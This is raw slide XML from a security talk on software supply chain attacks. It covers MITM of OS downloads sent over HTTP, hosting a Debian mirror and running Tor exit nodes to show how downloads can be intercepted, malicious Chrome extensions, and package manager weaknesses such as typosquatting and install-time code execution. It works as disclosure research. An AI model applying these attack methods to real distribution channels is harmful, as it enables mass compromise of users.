            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CentOS – yes HTTP redirect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Red Hat Enterprise – No, HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (see next)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Others – Probably, I got bored checking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="357427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91" y="0"/>
            <a:ext cx="5188218" cy="642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96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Consistently one of the top Linux distributions for all purposes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Probably root of majority of Linux installs (counting derivative distros)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Install process: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66" y="2749724"/>
            <a:ext cx="5445269" cy="3119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" y="1861381"/>
            <a:ext cx="6166974" cy="395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567" y="1797987"/>
            <a:ext cx="5848454" cy="439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733"/>
            <a:ext cx="6159831" cy="413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567" y="1737360"/>
            <a:ext cx="5833406" cy="509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07" y="1922008"/>
            <a:ext cx="6637293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17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Also downloads over HTTP by default; redirected to mirror or manual mirror selection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What if the download was Man-In-The-Middle intercepted and modified?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mirrors have copy of hashes and GPG signature of hashes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To validate an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, you must</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iso</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download the SHA*SUM file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Calculate and verify the hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download the sig file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Install GPG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find and download the proper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> key (ha!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Verify the signature of the hash sig file against the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do you think anybody does this? Did you even see the instructions for how to do this?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What if we did not even need to intercept the HTTP request?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="46955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a mirror </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2TB free space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scheduled </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rsync</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web form with your email in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3253318"/>
            <a:ext cx="9010650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6230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Debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 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169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Would the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> project allow hacker scriptjunkie@scriptjunkie.us to host a mirror?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You bet!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Side note:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mirror the CD/DVD’s, not the package archive too like we did</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Packages’ signatures are checked by apt; mirrors not trusted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CD/DVD’s: ~500GB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Packages: ~1.5TB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So do people check their signatures?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To the surprise of no-one… Nope!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I do not alter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iso’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or serve malicious files, but do others?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many mirrors of all distros in low-security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edu’s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I trust them, but not that they haven’t been compromised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330" y="23241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Debian Mirrors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2444841" cy="4023360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But that’s not all!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Debian is looking for a maintainer for the mirror selector</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Volunteer for a few hours and your package can control *all* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> downloads!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121" y="1962640"/>
            <a:ext cx="7986860" cy="425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7222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Slightly related gripe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AWS Linux VM 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>yr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> reserved with 15GB of storage: ~$135</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>With 2TB of storage: ~$2575 (SSD) to ~$735 (magnetic) extra; $200 to $50 more per month</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why does AWS charge enough to buy the entire drive to just borrow the space for 2 months?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use hosting providers on lowendbox.com for much less. (they also usually accept bitcoin)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030" y="3656490"/>
            <a:ext cx="4904899" cy="282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9679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OS Sierra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Insecure appstore.com and apple.com pages redirect to the App Store</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP pages with HTTPS download links</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>are the new HTTP login pages with HTTPS </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>form submission</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>That’s not how any of this works!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers can replace the links with</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>malicious ones</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Users have no reason to not trust a </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>package they think they got from the </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>real Apple site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789" y="2322813"/>
            <a:ext cx="5699915" cy="396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30" y="1737360"/>
            <a:ext cx="7505700" cy="353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501" y="2293581"/>
            <a:ext cx="4946039" cy="3992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5" y="2100221"/>
            <a:ext cx="1072515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578" y="1737360"/>
            <a:ext cx="8141804" cy="464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330" y="1585799"/>
            <a:ext cx="6210300" cy="4951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81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Thumb Drives, HID-spoofing Devices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0" b="14057"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1836958"/>
            <a:ext cx="5142156" cy="44554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9491"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7217254" y="1836958"/>
            <a:ext cx="3938426" cy="44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3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case you did not catch that</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://www.microsoft.com/en-us/accessibility/windows10upgrade    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>click download link to…</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" i="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://go.microsoft.com/fwlink/?LinkId=822783     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>HTTP 302 redirection to…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="1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https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://download.microsoft.com/download/0/4/7/047889D0-578C-4A44-A38F-7F30A6CB3809/current-version/Windows10Upgrade24074.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So close, still fail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker can intercept insecure HTTP download request, serve malicious exe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Down Arrow 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2891205" y="2736744"/>
            <a:ext cx="2584174" cy="52478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2891205" y="3718611"/>
            <a:ext cx="2584174" cy="52478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MITM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058401" cy="4023360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So everyone is downloading their OS’s and binaries over HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If we can’t set up a mirror, how does an average hacker MITM them?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hang around the coffee shop  :-/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set up a proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run tor exit nodes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host a free VPN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This has been done before (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OnionDuke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Did it work?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How effective could it be?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127" y="2625700"/>
            <a:ext cx="5779820" cy="3351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6909" y="5977468"/>
            <a:ext cx="512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Josh Pitts, BHUSA 2015 Repurposing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OnionDuke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96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MITM’able</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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45767" cy="4023360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ran port 80 tor exit nodes for a few weeks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kept list of URL’s retrieved (w/o sources)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Again, did not alter any download</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;5,000 executable files, packages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many software piracy-related files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many games</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some legitimate software utilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malware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827" y="1845734"/>
            <a:ext cx="5940458" cy="3818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5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In-the-wild Chrome extensions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025896" cy="4363042"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Chrome Extensions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be easily installed by users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Permission model can require access all data displayed on or type into websites, passwords, screen, microphone, webcam…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Filesystem access given certain constraints</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On Chrome OS, can control virtually everything</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the wild: (reported by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MalwareBytes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Unescapable popup (short of killing processes) forces most users to install the malicious extension</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disables access to chrome://extensions and chrome://settings so you cannot remove it through the Chrome UI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ad fraud and tech support scams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76" y="2075688"/>
            <a:ext cx="5038238" cy="37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36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541" y="2085198"/>
            <a:ext cx="4357850" cy="3544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Platforms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3"/>
            <a:ext cx="7058290" cy="45460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There are many ways users receive code in unverified ways</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers may use these to gain control of their systems </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And then obtain the users’ data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What if we skipped this entirely and just asked users for their data?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The 2017 Twitter Revolt was a great opportunity to test this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Due to UI changes, ads, harassment, blocking, Twitter users began to leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So many moved to the open-source federated Mastodon that the main instance stopped accepting registrations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Different mastodon instances can follow and talk with each other</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the following weeks, hundreds of Mastodon instances sprang up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>My instance had &gt;1500 signups in first few days; others had &gt; 10,000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many users already followed me</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I don’t spy on DM’s and take pride in a secure, reputable instance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do you trust others who are hiding their domain registration/admins?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126" y="1845734"/>
            <a:ext cx="3614184" cy="490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65014"/>
            <a:ext cx="10058400" cy="44907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proved most programming language package managers have major security weaknesses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Typo or wrong command attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Anonymous automatic registration and publishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Weak authentication, no 2-factor, sometimes none at all</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Expose powerful credentials to many different attack models by caching permanent credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Operating system package managers are manual-review and harder to poison</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But nearly every OS is acquired insecurely and unlikely to be verified by the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MITM attacks proven practical against proxy/VPN/Tor users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We became OS and package mirrors to prove</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Anyone could infect packages and OS’s delivered via mirror </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be quick, cheap, anonymous, with worldwide effect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Packages often are not verified against anything external</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We were </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>never denied</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Supply chain attacks are happening in the wild now</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32789147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65014"/>
            <a:ext cx="10058400" cy="4490787"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In other words, we have shown…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63"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2501720"/>
            <a:ext cx="12074554" cy="27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827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12563"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="1"/>
            <a:ext cx="12196932" cy="6894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6352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software supply chain attacks?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Nearly impossible to detect/differentiate evil software update/download</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It comes when you expect from where you expect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Of course you have not seen it before</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vast scale; compromising the developers or distribution of popular software owns millions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You think hunting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sysadmins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> gets you access? Wait until you hunt developers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But don’t they require world-class exploitation skills or cryptographic miracles?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Aren’t developers much more tech-savvy and hard to own compared to normal users?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38" y="1846263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15327936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44606</TotalTime>
  <Words>3811</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>474</Paragraphs>
  <Slides>87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Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Retrospect</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Prior Work</vt:lpstr>
      <vt:lpstr>Prior Work</vt:lpstr>
      <vt:lpstr>Prior Work</vt:lpstr>
      <vt:lpstr>App Stores</vt:lpstr>
      <vt:lpstr>Kingslayer breach</vt:lpstr>
      <vt:lpstr>Supermicro Apple breach</vt:lpstr>
      <vt:lpstr>Thumb Drives, HID-spoofing Devices</vt:lpstr>
      <vt:lpstr>Why software supply chain attacks?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Supply Chain Attack Considerations</vt:lpstr>
      <vt:lpstr>Package Manager Pwnage</vt:lpstr>
      <vt:lpstr>Package Managers Overview</vt:lpstr>
      <vt:lpstr>Package Managers Overview</vt:lpstr>
      <vt:lpstr>Package Managers Attack #1</vt:lpstr>
      <vt:lpstr>Package Managers Attack #2</vt:lpstr>
      <vt:lpstr>Package Managers Attack #3</vt:lpstr>
      <vt:lpstr>Package Managers Attack #4</vt:lpstr>
      <vt:lpstr>Package Manager Pwnage</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Pip/PyPI: The Python Package Manager</vt:lpstr>
      <vt:lpstr>PyPI: Registration</vt:lpstr>
      <vt:lpstr>PyPI: Targeting popular packages</vt:lpstr>
      <vt:lpstr>PyPI: Submitting A Package</vt:lpstr>
      <vt:lpstr>PyPI: Code Execution On Pip Install</vt:lpstr>
      <vt:lpstr>Pip: Post-Exploit Power</vt:lpstr>
      <vt:lpstr>Pip: Post-Exploit Power</vt:lpstr>
      <vt:lpstr>Pip/PyPI Results</vt:lpstr>
      <vt:lpstr>PyPI installs</vt:lpstr>
      <vt:lpstr>Pip/PyPI Results</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>NPM: The node.js Package Manager</vt:lpstr>
      <vt:lpstr>NPM: Registration</vt:lpstr>
      <vt:lpstr>NPM: Targeting popular packages</vt:lpstr>
      <vt:lpstr>NPM: Submitting A Package</vt:lpstr>
      <vt:lpstr>NPM: Code Execution On Npm Install</vt:lpstr>
